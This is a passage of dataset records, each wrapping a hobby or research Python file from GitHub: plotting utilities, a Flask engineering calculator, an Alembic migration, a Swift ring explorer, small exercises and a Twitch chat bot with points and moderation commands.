hk.Linear(output_size=self.output_dim)(out1 + out2)\n\n leaves_eta = []\n for i in range(len(self.params_flow_shapes) - 1):\n param_i, flow_params_merged = jnp.split(\n flow_params_merged, (math.prod(self.params_flow_shapes[i]),), axis=-1)\n leaves_eta.append(\n 
param_i.reshape((num_eta_new,) + self.params_flow_shapes[i]))\n leaves_eta.append(\n flow_params_merged.reshape((num_eta_new,) +\n self.params_flow_shapes[-1]))\n\n params_flow_out = jax.tree_util.tree_unflatten(\n treedef=self.params_flow_treedef, leaves=leaves_eta)\n\n return params_flow_out\n","repo_name":"chriscarmona/modularbayes","sub_path":"modularbayes/_src/metaposterior/vmp_map.py","file_name":"vmp_map.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42102337831","text":"\"\"\"\nSA/plotter.py\n\nAuthor: Olivier Vadiavaloo\n\nDescription:\nThis module implements the plotter subclass for plotting the results\nof simulated annealing for a given game.\n\"\"\"\nfrom time import time\nfrom scipy.interpolate import interp1d\nimport src.Utils.plotter as base_plt\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sb\nimport os\nfrom os.path import join\n\nclass Plotter(base_plt.Plotter):\n\n def parse_data(self, data_dict, three_dim):\n # assert len(data_dict) > 0, 'Empty data dictionary'\n if len(data_dict) == 0:\n X = np.array([])\n Y = np.array([])\n Z = np.array([])\n\n if three_dim:\n return X, Y, Z\n else:\n return X, Y\n\n score = []\n time = []\n iteration = []\n for iter, score_time_tuple in data_dict.items():\n score.append(score_time_tuple[0])\n time.append(score_time_tuple[1])\n iteration.append(iter)\n\n X, Y, Z = np.array(iteration), np.array(score), np.array(time)\n\n if three_dim:\n return X, Y, Z\n else:\n return X, Y\n\n def save_data(self, *data, names):\n DATA_DIR = 'data/'\n count = 0\n for data_dict in data:\n if not os.path.exists(DATA_DIR):\n os.makedirs(DATA_DIR)\n\n with open(join(DATA_DIR + names[count]), 'w') as data_file:\n data_file.write(f'# {names[count]}\\n')\n x, y, z = self.parse_data(data_dict, True)\n\n for i in range(len(y)):\n data_file.write(f'{x[i]} {y[i]} {z[i]}\\n')\n\n count += 1\n\n def plot_average_curve(self, paths_by_config):\n all_times, all_scores = self.parse_all_paths(paths_by_config)\n\n min_max_time = self.find_min_max_time(all_times)\n union_time, union_score, union_config_name = self.interpolate_all(min_max_time, all_times, all_scores)\n\n iter_frame = pd.DataFrame({'score': union_score, 'time': union_time, 'name': union_config_name})\n\n fig, ax = plt.subplots()\n sns_plot = sb.lineplot(x='time', y='score', hue='name', n_boot=1000,\n ci=70, style='name', markers=False, data=iter_frame)\n ax.set_ylabel('Score')\n ax.set_xlabel('Running Time (mins)')\n\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles=handles[0:], labels=labels[0:])\n\n plot_name = 'average_curve'\n sns_plot.get_figure().savefig(plot_name + '.png')\n plt.show()\n\n def interpolate_all(self, x_upper_bound, times_by_config, scores_by_config):\n union_time = []\n union_score = []\n union_config_name = []\n for config_name, scores_by_config_run in scores_by_config.items():\n for run_index, score in scores_by_config_run.items():\n x_range = np.linspace(0, x_upper_bound, num=100, endpoint=True)\n\n interpolated_function = interp1d(times_by_config[config_name][run_index], score)\n interpolated_scores = interpolated_function(x_range)\n\n union_time.extend(x_range)\n union_score.extend(interpolated_scores)\n union_config_name.extend([config_name for _ in range(len(x_range))])\n\n return union_time, union_score, union_config_name\n\n def find_min_max_time(self, all_times):\n max_times = []\n for 
times_by_config_run in all_times.values():\n            for time in times_by_config_run.values():\n                max_times.append(max(time))\n        \n        return min(max_times)\n\n    def parse_all_paths(self, paths_by_config):\n        all_scores = {}\n        all_times = {}\n        for config_name, paths_by_config_run in paths_by_config.items():\n            all_scores[config_name] = {}\n            all_times[config_name] = {} \n            for run_index, path in paths_by_config_run.items():\n                time, score = self.parse_dat_file(path)\n                \n                if time[0] != 0:\n                    time.insert(0, 0)\n                    score.insert(0, round(0.0, 2))\n\n                time.append(running_time) # NOTE: running_time is expected to be defined at module level (see the commented-out __main__ below)\n                best_overall_score = score[-1]\n                score.append(best_overall_score)\n\n                all_scores[config_name][run_index] = score\n                all_times[config_name][run_index] = time\n\n        print(all_times)\n        print(all_scores)\n        return all_times, all_scores\n\n    def construct_dat_filenames(self, plot_filename):\n        return {\n            'all_scores': 'all_scores_' + plot_filename.replace('graph', 'data') + '.dat',\n            'best_scores': 'best_scores_' + plot_filename.replace('graph', 'data') + '.dat',\n            'unoptimized_scores': 'unoptimized_scores_' + plot_filename.replace('graph', 'data') + '.dat',\n            'optimized_scores': 'optimized_scores_' + plot_filename.replace('graph', 'data') + '.dat'\n        }\n\n    def construct_paths_by_config(self, dat_filepaths_by_config):\n        paths_by_config = {}\n        for config in dat_filepaths_by_config:\n            paths_by_config[config] = {}\n\n            with open(config, 'r') as dat_filepaths_file:\n                dat_filepaths = dat_filepaths_file.readlines()\n                for run_index, dat_filepath in enumerate(dat_filepaths):\n                    paths_by_config[config][run_index] = dat_filepath\n\n        return paths_by_config\n\n\n# if __name__ == '__main__':\n\n    # running_time = INSERT RUNNING TIME\n    # plotter = Plotter()\n\n    # plot_names = {\n    #     'x': 'Elapsed Time (mins)',\n    #     'y': 'Program Score',\n    #     'z': 'Iterations',\n    #     'title': 'SA Program Scores vs Total Iterations',\n    #     'filename': 'some_graph',\n    #     'legend': ['all scores', 'unoptimized scores']\n    # }\n    \n    # paths = []\n    # paths.append(os.path.join('data/' + 'all_scores_no_opt_data.dat'))\n    # paths.append(os.path.join('data/' + 'best_scores_unopt_vs_opt_data.dat'))\n    # paths.append(os.path.join('data/' + 'unoptimized_scores_no_opt_data.dat'))\n    # paths.append(os.path.join('data/' + 'optimized_scores_no_opt_data.dat'))\n\n    # plotter.plot_from_file(paths, plot_names, same_fig=False, three_dim=False)\n\n    # paths_by_config = {\n    #     INSERT PATHS TO DATA FILES BY CONFIG AND BY RUN INDEX\n    # }\n\n    # plotter.plot_average_curve(paths_by_config)","repo_name":"lelis-research/PyGames-synthesis","sub_path":"src/SA/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71692174324","text":"import sqlite3\r\nfrom pathlib import Path\r\n\r\n\r\ndef create_db(db_path: Path, init_script_path: Path):\r\n    con = sqlite3.connect(db_path)\r\n    cur = con.cursor()\r\n    with open(init_script_path, \"r\") as f:\r\n        text = f.read()\r\n    cur.executescript(text)\r\n    cur.close()\r\n    con.close()\r\n","repo_name":"DashViolin/gb_pypatterns","sub_path":"wsgi_framework/architectural_system_patterns/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5350960654","text":"from werkzeug.datastructures import MultiDict\n\nfrom prepare import zip_form, wtcal_output\nfrom model import GeometryInput, MaterialInput, MetalLayer, LoadInput, \\\n    
SafetyClass, Other, CalWith, ImportFrom\nfrom compute import cal_pressure_containment, cal_collaps, \\\n cal_prop_buckling, cal_reeling\n\n\ndef home_page(flask):\n return flask.render_template(\"home.html\")\n\n\ndef wtcal_compute(flask):\n import_from = ImportFrom()\n\n geo = GeometryInput(flask.request.form)\n geo_fields = zip_form(geo)\n\n material = MaterialInput(flask.request.form)\n material_fields = zip_form(material)\n\n metal = MetalLayer(flask.request.form)\n metal_fields = zip_form(metal)\n\n load = LoadInput(flask.request.form)\n load_fields = zip_form(load)\n\n safety = SafetyClass(flask.request.form)\n safety_fields = zip_form(safety)\n\n other = Other(flask.request.form)\n other_fields = zip_form(other)\n\n cal_with_fields = CalWith(flask.request.form)\n\n if flask.request.method == 'POST':\n if geo.validate() and material.validate() and \\\n load.validate() and safety.validate():\n steel_outer_diameter = geo.steel_outer_diameter.data\n corrosion_allowance = geo.corrosion_allowance.data\n\n fabrication_method = material.fabrication_method.data\n pipe_material = material.pipe_material.data\n max_design_temperature = material.max_design_temperature.data\n supplimentary_d_fulfilled = material.supplimentary_d_fulfilled.data\n supplimentary_u_fulfilled = material.supplimentary_u_fulfilled.data\n\n any_inner_metal_layer = metal.any_inner_metal_layer.data\n cladded_or_lined = metal.cladded_or_lined.data\n metal_layer_type = metal.metal_layer_type.data\n\n design_pressure = load.design_pressure.data\n level = load.level.data\n max_contents_density = load.max_contents_density.data\n water_depth_for_bursting = load.water_depth_for_bursting.data\n water_depth_for_collapse_and_prop_buckling = load.water_depth_for_collapse_and_prop_buckling.data\n sea_water_density = load.sea_water_density.data\n\n contents_type = safety.contents_type.data\n operation_zone = safety.operation_zone.data\n\n # Example Other\n example_param_float = other.example_param_float.data\n example_param_select = other.example_param_select.data\n\n pressure_containment = cal_with_fields.pressure_containment.data\n collaps = cal_with_fields.collaps.data\n propgation_buckling = cal_with_fields.propgation_buckling.data\n reeling_screening_check = cal_with_fields.reeling_screening_check.data\n vessel = cal_with_fields.vessel.data\n\n r1, r2, r3, r4 = 0, 0, 0, 0\n\n if pressure_containment is True:\n r1 = cal_pressure_containment(steel_outer_diameter,\n corrosion_allowance,\n fabrication_method,\n pipe_material,\n max_design_temperature,\n supplimentary_d_fulfilled,\n supplimentary_u_fulfilled,\n design_pressure,\n level,\n max_contents_density,\n sea_water_density,\n water_depth_for_bursting,\n contents_type,\n operation_zone)\n if collaps is True:\n r2 = cal_collaps(steel_outer_diameter,\n corrosion_allowance,\n fabrication_method,\n pipe_material,\n max_design_temperature,\n supplimentary_d_fulfilled,\n supplimentary_u_fulfilled,\n sea_water_density,\n water_depth_for_collapse_and_prop_buckling,\n contents_type,\n operation_zone)\n if propgation_buckling is True:\n r3 = cal_prop_buckling(steel_outer_diameter,\n corrosion_allowance,\n fabrication_method,\n pipe_material,\n max_design_temperature,\n supplimentary_d_fulfilled,\n supplimentary_u_fulfilled,\n sea_water_density,\n water_depth_for_collapse_and_prop_buckling,\n contents_type,\n operation_zone)\n if reeling_screening_check is True:\n r4 = cal_reeling(steel_outer_diameter,\n fabrication_method,\n vessel,\n any_inner_metal_layer,\n cladded_or_lined)\n\n result = 
wtcal_output(r1=r1, r2=r2, r3=r3, r4=r4)\n            return flask.jsonify({\"result\": result})\n        else:\n            return flask.jsonify({\"result\": \"Please Fill In Blanks With Valid Values.\"})\n\n    return flask.render_template(\"wtcal.html\",\n                                 import_from=import_from,\n                                 geo_fields=geo_fields,\n                                 material_fields=material_fields,\n                                 metal_fields=metal_fields,\n                                 load_fields=load_fields,\n                                 safety_fields=safety_fields,\n                                 other_fields=other_fields,\n                                 cal_with_fields=cal_with_fields)\n","repo_name":"luyuqing/subsea_to_cloud","sub_path":"decision_logic.py","file_name":"decision_logic.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"158997031","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pprint import pprint\nfrom swift.common.ring import Ring\n\n\nservers = (\"account\", \"container\", \"object\")\nfor server in servers:\n    ring = Ring('/etc/swift/%s.ring.gz' % server)\n    print(server)\n    pprint(ring._devs)\n    ip_ports = set()\n    for dev in ring.devs:\n        if dev:\n            ip_ports.add((dev['region'], dev['zone'],\n                          dev['ip'], dev['port']))\n    \n    pprint(ip_ports)\n    \n# ring is now the object ring (the last one from the loop)\nprint(ring.partition_count, ring.replica_count)\n\n\n# Partition Assignment List\n# This is a list of array('H') of device ids. The outermost list contains an array('H') for each replica. \n# Each array('H') has a length equal to the partition count for the ring. \n# Each integer in the array('H') is an index into the above list of devices. \n# The partition list is known internally to the Ring class as _replica2part2dev_id.\n\nfor replica in xrange(ring.replica_count):\n    print(\"Replica %d:\" % replica)\n    #print(len(ring._replica2part2dev_id[replica]), ring._replica2part2dev_id[replica])\n    \n\nfor partition in xrange(ring.partition_count): \n    devices = [ring.devs[part2dev_id[partition]] for part2dev_id in ring._replica2part2dev_id]\n    #pprint(devices)\n    \n    \n# Partition Shift Value\n# The partition shift value is known internally to the Ring class as _part_shift. \n# This value is used to shift an MD5 hash to calculate the partition on which the data for that hash should reside\n# Only the top four bytes of the hash are used in this process\nfrom hashlib import md5\nfrom struct import unpack_from\n\npaths = [\"AUTH_d4d0fdacde194128bfc90f2f8c2dae8a\"]\npaths.append(\"foo\")\npaths.append(\"test.py\")\nHASH_PATH_PREFIX = HASH_PATH_SUFFIX = \"deepgully\"\ndigest = md5(HASH_PATH_PREFIX + '/' + '/'.join(paths) + HASH_PATH_SUFFIX).digest()\npartition = unpack_from('>I', digest)[0] >> ring._part_shift\nprint(partition)\n\n\n# Building the Ring\n# 1. The initial building of the ring first calculates the number of partitions that should ideally be assigned \n# to each device based on the device's weight\n# 2. 
Then, the ring builder assigns each replica of each partition to the device that desires the most partitions\n# at that point while keeping it as far away as possible from other replicas\n ","repo_name":"deepgully/codes","sub_path":"swift/ring.py","file_name":"ring.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"125151448","text":"\"\"\"Redo roles scopes mapping\n\nRevision ID: 9f38dad37628\nRevises: eb1e6ec39b83\nCreate Date: 2023-03-03 16:53:03.553992\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nfrom sqlalchemy import text\nfrom sqlalchemy.engine import ResultProxy\n\nrevision = \"9f38dad37628\"\ndown_revision = \"eb1e6ec39b83\"\nbranch_labels = None\ndepends_on = None\n\n\ndef swap_roles(old_role: str, new_role: str):\n bind = op.get_bind()\n matched_rows: ResultProxy = bind.execute(\n text(\"SELECT * FROM fidesuserpermissions WHERE :old_role = ANY(roles);\"),\n {\"old_role\": old_role},\n )\n for row in matched_rows:\n current_roles = row[\"roles\"]\n current_roles.remove(old_role)\n current_roles.append(new_role)\n bind.execute(\n text(\"UPDATE fidesuserpermissions SET roles= :roles WHERE id= :id\"),\n {\"roles\": sorted(list(set(current_roles))), \"id\": row[\"id\"]},\n )\n\n matched_client_rows: ResultProxy = bind.execute(\n text(\"SELECT * FROM client WHERE :old_role = ANY(roles);\"),\n {\"old_role\": old_role},\n )\n for row in matched_client_rows:\n client_roles = row[\"roles\"]\n client_roles.remove(old_role)\n client_roles.append(new_role)\n bind.execute(\n text(\"UPDATE client SET roles= :roles WHERE id= :id\"),\n {\"roles\": sorted(list(set(client_roles))), \"id\": row[\"id\"]},\n )\n\n\ndef upgrade():\n swap_roles(\"admin\", \"owner\")\n swap_roles(\"viewer_and_privacy_request_manager\", \"viewer_and_approver\")\n swap_roles(\"privacy_request_manager\", \"approver\")\n\n\ndef downgrade():\n swap_roles(\"owner\", \"admin\")\n swap_roles(\"viewer_and_approver\", \"viewer_and_privacy_request_manager\")\n swap_roles(\"approver\", \"privacy_request_manager\")\n","repo_name":"ethyca/fides","sub_path":"src/fides/api/alembic/migrations/versions/9f38dad37628_redo_roles_scopes_mapping.py","file_name":"9f38dad37628_redo_roles_scopes_mapping.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"76"} +{"seq_id":"71456104244","text":"from collections import defaultdict\nclass TimeMap:\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.dictstore = defaultdict(list)\n\n def set(self, key: str, value: str, timestamp: int) -> None:\n self.dictstore[key].append((timestamp,value))\n return None\n\n def get(self, key: str, timestamp: int) -> str:\n valuelist = self.dictstore[key]\n l = 0\n r = len(valuelist)\n while l < r:\n m = l+(r-l)//2\n if valuelist[m][0]>timestamp:\n r = m\n else:\n l = m+1\n return \"\" if l == 0 else valuelist[l-1][1]\n\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)","repo_name":"cccccccccccccc/Myleetcode","sub_path":"981/Time Based Key-Value Store.py","file_name":"Time Based Key-Value Store.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1580503460","text":"import 
configparser\nimport pygame\nimport time\nimport sys\nfrom twitchio.ext import commands\nfrom threading import Thread\nfrom Character import Character\nfrom Clod import Clod\nimport database\nimport twitch_api\n\nconfig = configparser.ConfigParser()\nconfig.read('settings.ini')\nclient_id = config['Twitch']['client_id']\nclient_secret = config['Twitch']['client_secret']\naccess_token = config['Twitch']['access_token']\ntoken_oauth = config['Twitch']['token_oauth']\n\n\n# def get_chatters():\n# \"\"\"\n# Gets list of viewers from chat.\n# \"\"\"\n# header = {\n# 'Authorization': f'Bearer {access_token}',\n# 'Client-Id': client_id,\n# }\n# respond = requests.get('https://tmi.twitch.tv/group/user/pianoparrot/chatters', headers=header)\n# return respond.json()['chatters']['viewers'] + respond.json()['chatters']['moderators'] + ['pianoparrot']\n\n\nbot = commands.Bot(\n token=token_oauth,\n client_id=client_id,\n client_secret=client_secret,\n prefix='!',\n initial_channels=['pianoparrot']\n)\n\n\n@bot.event\nasync def event_message(ctx):\n await bot.handle_commands(ctx)\n\n\n@bot.command(name='test')\nasync def test_command(ctx):\n \"\"\"\n Testing function.\n \"\"\"\n print(ctx.message.raw_data)\n print(ctx.message.content)\n print(ctx.message.content[ctx.message.content.find(' ') + 1:])\n print(ctx.message.author)\n print(ctx.message.echo)\n print(ctx.message.timestamp)\n print(ctx.message.tags)\n print(ctx.message.tags['display-name'])\n print(ctx.message.channel)\n print(ctx.message.id)\n text = ctx.message.content.split(' ', maxsplit=2)\n if len(text) >= 2:\n print(text[1])\n if len(text) == 3:\n print(text[2])\n await ctx.send('this is a test response')\n\n\n@bot.command(name='lurk')\nasync def new_lurker(ctx):\n user_name = ctx.message.tags['display-name']\n\n if user_name in [lurker.name for lurker in Character.lurking_list]:\n await ctx.send(f\"Hey {user_name}, you are already lurking :-)\")\n\n elif not any(Character.positions.values()):\n await ctx.send(f\"I'm sorry {user_name}, but there are no free seats :-(\")\n\n else:\n if database.check_users(user_name):\n Character(user_name, screen, database.get_points(user_name))\n else:\n database.insert_user(user_name)\n Character(user_name, screen)\n await ctx.send(f\"{user_name} is now lurking\")\n\n\n@bot.command(name='wave')\nasync def lurker_wave(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n lurker.wave_update()\n\n\n@bot.command(name='clap')\nasync def lurker_clap(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n lurker.clap_update()\n\n\n@bot.command(name='leave')\nasync def lurker_leave(ctx):\n user_name = ctx.message.tags['display-name']\n\n if user_name not in [lurker.name for lurker in Character.lurking_list]:\n await ctx.send(f\"Hey {user_name}, you were not lurking :-)\")\n\n else:\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0 and not any(lurker.all_animations):\n lurker.leave_update()\n await ctx.send(f\"{user_name} has left the lurking place\")\n\n\n@bot.command(name='clod')\nasync def clod(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0:\n if lurker.points >= 10:\n lurker.get_a_clod()\n await ctx.send(f\"{user_name}, you've got a clod, now you can throw it! 
-10 points\")\n else:\n await ctx.send(f\"{user_name}, you need at least 10 points to purchase the clod :-)\")\n\n\n@bot.command(name='numclods')\nasync def clods(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0:\n await ctx.send(f\"{user_name}, you have {lurker.clod_amount} clod\"+(f\"s\"*(lurker.clod_amount != 1)))\n\n\n@bot.command(name='throw')\nasync def throw(ctx):\n user_name = ctx.message.tags['display-name']\n target = ctx.message.content[ctx.message.content.find(' ') + 1:]\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0 and not any(lurker.all_animations):\n if lurker.clod_amount > 0:\n for aim in Character.lurking_list:\n if aim.name.lower() == target.lower() and aim.position <= 0:\n lurker.throw_update(aim.seat_point)\n else:\n await ctx.send(f\"{user_name}, you have no clods to throw :-(\")\n\n\n@bot.command(name='catch')\nasync def catch(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n lurker.catch_update()\n\n\n@bot.command(name='points')\nasync def lurker_points(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n await ctx.send(f\"Your points: {lurker.points}\")\n\n\n@bot.command(name='get_vip_for_a_week')\nasync def get_vip_for_a_week(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if lurker.points >= 300:\n if user_name not in twitch_api.get_vip_list():\n status = lurker.get_vip_status()\n if status and status != 422:\n await ctx.send(f\"{user_name} purchased VIP status! :O -300 points\")\n else:\n await ctx.send(f\"Sorry {user_name}, something went wrong :\\\\ Try again in a few seconds\")\n else:\n await ctx.send(f\"Hey {user_name}, you already have VIP status :\\\\\")\n else:\n await ctx.send(f\"Hey {user_name}, you are too poor :D You need to have 300 points for this\")\n\n\n@bot.command(name='remove_vip_status')\nasync def remove_vip_status(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if user_name in twitch_api.get_vip_list():\n status = lurker.lose_vip_status()\n if status and status != 422:\n await ctx.send(f\"You've been kicked out of the VIP room! :|\")\n else:\n await ctx.send(f\"Sorry {user_name}, something went wrong :\\\\ Try again in a few seconds\")\n else:\n await ctx.send(f\"Hey {user_name}, you are just a regular :D\")\n\n\n@bot.command(name='timeout')\nasync def timeout(ctx):\n target = None\n reason = None\n\n user_name = ctx.message.tags['display-name']\n text = ctx.message.content.split(' ', maxsplit=2)\n\n if len(text) >= 2:\n target = text[1].lower()\n if len(text) >= 3:\n reason = text[2]\n\n if target:\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if lurker.points >= 100:\n if target == 'pianoparrot':\n await ctx.send(f\"Haha :D Do not even think about it :\\\\\")\n elif target in ['kindredspirits7', 'dilecula', 'amanrosse', 'haarolean']:\n await ctx.send(f\"That was brave, {user_name} B) But no :D \")\n elif target in ['donationalerts_', 'moobot', 'restreambot', 'songlistbot', 'streamelements']:\n await ctx.send(f\"Really? 
They're not even human :\\\\\")\n elif target in twitch_api.get_list_of_banned_users():\n await ctx.send(f\"{user_name}, somebody already banned {target} :D\")\n else:\n status = lurker.give_timeout(target, reason if reason else None)\n if status and target == lurker.name:\n await ctx.send(f\"Good job, {user_name}, you banned yourself :D -100 points\")\n elif status:\n await ctx.send(f\"{user_name} just banned {target} :O -100 points\")\n else:\n await ctx.send(f\"Sorry {user_name}, something went wrong :\\\\ Try again in a few seconds\")\n else:\n await ctx.send(f\"{user_name}, you need at least 100 points to use such power B)\")\n \n \n@bot.command(name='play')\nasync def play(ctx):\n user_name = ctx.message.tags['display-name']\n bet = ctx.message.content[ctx.message.content.find(' ') + 1:]\n \n if bet.isdigit() and int(bet) > 0:\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if lurker.points >= int(bet):\n lurker.ready_to_play(bet)\n await ctx.send(f\"{user_name} wants to play for {bet} point{'s' if int(bet) > 1 else ''} B) Who will accept the challenge?\")\n else:\n await ctx.send(f\"{user_name}, you don't have enough points for this bet :\\\\\")\n\n\n@bot.command(name='accept')\nasync def accept(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n for target in Character.lurking_list:\n if target.calling_for_play and target.name != lurker.name:\n if lurker.points >= target.bet:\n await ctx.send(f\"{target.name}'s challenge is accepted by {lurker.name} :O\")\n status = lurker.play_round(target, target.bet)\n await ctx.send(f\"{user_name} threw {lurker.pick.upper()} and {target.name} threw {target.pick.upper()}\")\n if status:\n await ctx.send(f\"{user_name} won and got {target.bet} point{'s' if target.bet > 1 else ''}! B)\")\n elif status is None:\n await ctx.send(f\"DRAW!\")\n else:\n await ctx.send(f\"{target.name} won and got {target.bet} point{'s' if target.bet > 1 else ''}! 
B)\")\n else:\n await ctx.send(f\"{user_name}, you don't have enough points to accept the challenge :(\")\n\n\n@bot.command(name='leave_all')\nasync def lurker_leave(ctx):\n user_name = ctx.message.tags['display-name']\n\n if user_name == 'PianoParrot':\n for lurker in Character.lurking_list:\n if lurker.position <= 0 and not any(lurker.all_animations):\n lurker.leave_update()\n\n\n@bot.command(name='com_list')\nasync def com_list(ctx):\n await ctx.send(f\"Commands are available: !lurk, !leave, !wave, !clap, !clod, !numclods, !throw username, !catch, !points, !get_vip_for_a_week, !remove_vip_status, !timeout username reason(optional), !lurkers\")\n\n\n@bot.command(name='lurkers')\nasync def all_lurkers_list(ctx):\n if Character.lurking_list:\n await ctx.send(f\"Lurking: {Character.show_lurkers()}\")\n\n else:\n await ctx.send(\"Nobody is lurking now...\")\n\n\ndef checking():\n global past_time\n past_time = time.time()\n current_viewers = twitch_api.get_chatters()\n for lurker in Character.lurking_list:\n if lurker.name.lower() not in current_viewers:\n lurker.leave_update()\n\n\ndef vip_expired():\n all_vip_users = twitch_api.get_vip_list()\n for user in all_vip_users:\n vip_time = database.get_vip_time(user)\n if vip_time and vip_time + 604800 < time.time():\n username_id = twitch_api.get_user_id(user.lower())\n twitch_api.remove_vip_status(username_id)\n\n\nif __name__ == '__main__':\n vip_expired()\n t1 = Thread(target=bot.run)\n t1.start()\n pygame.init()\n screen = pygame.display.set_mode((1920, 1080))\n pygame.display.set_caption('twitch_app')\n bg_color = (0, 255, 0)\n\n past_time = time.time() # start time\n\n while True:\n if time.time() >= past_time + 1200: # if 20 minutes has passed, checks if lurkers are still watching\n t2 = Thread(target=checking)\n t2.start()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n screen.fill(bg_color)\n if Character.lurking_list:\n [clod.fly() for clod in Clod.clod_list]\n [(lurker.move(), lurker.chair_puff(), lurker.wave(), lurker.clap(), lurker.points_gain(),\n lurker.clod_collision(), lurker.throw(), lurker.catch(), lurker.caught(),\n lurker.ouch()) for lurker in Character.lurking_list]\n [lurker.leave() for lurker in Character.lurking_list]\n pygame.display.update()\n pygame.time.delay(40)\n","repo_name":"Nilumilak/Twitch_app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29590230616","text":"# roll x y-sided dice z times and get some stats\n# set number of dice in Cup class\n# set number of sides on die in Die class\n# set number of rolls in main()\n\nimport random\nfrom collections import Counter\nfrom matplotlib import pyplot as plt\n\n\nclass Cup:\n \"\"\" a cup to hold some dice \"\"\"\n def __init__(self):\n self.number_of_dice = 3\n self.dice = []\n\n def roll_dice(self):\n for die in self.dice:\n die.roll()\n\n def get_rolls(self):\n for die in self.dice:\n print(\"{}:{}\".format(self.dice.index(die) + 1, die.rolls))\n\n def set_dice(self):\n for die in self.dice:\n die.set_nums()\n\n def setup(self):\n self.dice = [Die() for i in range(self.number_of_dice)]\n self.set_dice()\n\n def get_roll_count(self):\n for die in self.dice:\n die.roll_count()\n\nclass Die:\n \"\"\" class for a single die \"\"\"\n def __init__(self):\n self.sides = 12\n self.numbers = []\n self.rolls = []\n self.rollcount = {}\n\n def set_nums(self):\n self.numbers = [i for i in 
range(1,self.sides+1)]\n\n def roll(self):\n a = random.choice(self.numbers)\n self.rolls.append(a)\n\n def roll_count(self):\n for i in range(1, self.sides +1):\n self.rollcount[i] = 0\n for k, v in Counter(self.rolls).items():\n self.rollcount[k] = v\n\n\ndef main():\n n_rolls = 1000\n cup = Cup()\n cup.setup()\n\n # roll the dice n times\n for i in range(n_rolls):\n cup.roll_dice()\n\n #cup.get_rolls()\n cup.get_roll_count()\n\n for die in cup.dice:\n a = []\n b = [i for i in range(1, cup.dice[0].sides +1)]\n x = die.rollcount\n\n for k, v in sorted(x.items()):\n a.append(x[k])\n\n fig,ax = plt.subplots()\n plt.bar(b,a)\n plt.title(\"dice {}\".format(cup.dice.index(die)+1))\n plt.show()\n\n\nmain()\n","repo_name":"airSipper/stats","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44589137915","text":"# github_api_client.py\n\nimport os\n\nGITHUB_API_TOKEN = os.environ.get(\"GITHUB_API_TOKEN\")\n\n\n# get repository names for a given github user from the github api\ndef get_repo_names(user):\n import requests\n\n url = f\"https://api.github.com/users/{user}/repos\"\n headers = {\"Authorization\": f\"token {GITHUB_API_TOKEN}\"}\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return [repo[\"name\"] for repo in response.json()]\n","repo_name":"kaimhall/copilot","sub_path":"github_api_client.py","file_name":"github_api_client.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12161497408","text":"\"\"\"Test Model module\"\"\"\nfrom __future__ import absolute_import\n\nimport ruamel.yaml as yaml\n\nimport luchador.nn as nn\nfrom luchador.nn.model import Container\nfrom tests.unit import fixture\n\n\ndef _make_model(scope, model_config):\n with nn.variable_scope(scope):\n return nn.util.make_model(model_config)\n\n\ndef _get_models(scope, model_configs):\n models, container = [], Container()\n for i, cfg in enumerate(model_configs):\n model = _make_model(scope, cfg)\n models.append(model)\n container.add_model('model_{}'.format(i), model)\n return models, container\n\n\n_MODEL_DEFS = 